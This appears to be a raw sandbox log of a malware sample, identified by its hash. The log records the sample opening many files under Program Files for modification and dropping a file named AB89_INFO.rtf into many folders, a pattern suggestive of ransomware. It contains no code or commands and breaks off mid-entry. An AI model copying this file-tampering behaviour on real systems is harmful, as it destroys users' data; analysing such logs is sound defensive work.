095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Thimphu 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Niue 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbynet.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Update\Install\{5DF2DCA9-BD54-4513-9B32-2C551D72B961}\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kosrae 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hu.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qatar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\kn.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\dnsns.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Scoresbysund 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Lagos 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\St_Johns 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_100_percent.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-6 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Stanley 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\cmm\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\management\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-10 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nipigon 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Menominee 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wake 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\release 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Resolute 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification 